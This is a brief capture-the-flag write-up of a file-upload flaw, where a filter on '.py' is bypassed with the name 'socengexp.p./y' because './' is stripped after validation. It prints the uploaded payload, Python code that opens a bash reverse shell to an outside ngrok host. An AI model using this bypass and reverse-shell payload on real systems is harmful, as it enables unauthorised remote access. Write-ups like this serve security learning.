Ezflag Level 1
This was a file upload vulnerability. Looking inside the
lighttpd.conf
file, we could see that any .py
files are run with /usr/bin/python3
.alias.url += ( "/cgi-bin" => "/var/www/cgi-bin" )
alias.url += ( "/uploads" => "/var/www/upload" )
cgi.assign = ( ".py" => "/usr/bin/python3" )
Validation is performed to check for the
.py
extension.def valid_file_name(name) -> bool:
if len(name) == 0 or name[0] == '/':
return False
if '..' in name:
return False
if '.py' in name:
return False
return True
However, once validated, a replacement of
./
with an empty string is performed.normalized_name = item.filename.strip().replace('./', '')
Thus, we can bypass the
.py
filter by using ./py
.Content-Disposition: form-data; name="file"; filename="socengexp.p./y"
Content-Type: text/x-python-script
import os
os.system('bash -c "bash -i >& /dev/tcp/2.tcp.ngrok.io/15273 0>&1"')
This allows us to get a reverse shell.
Last modified 8mo ago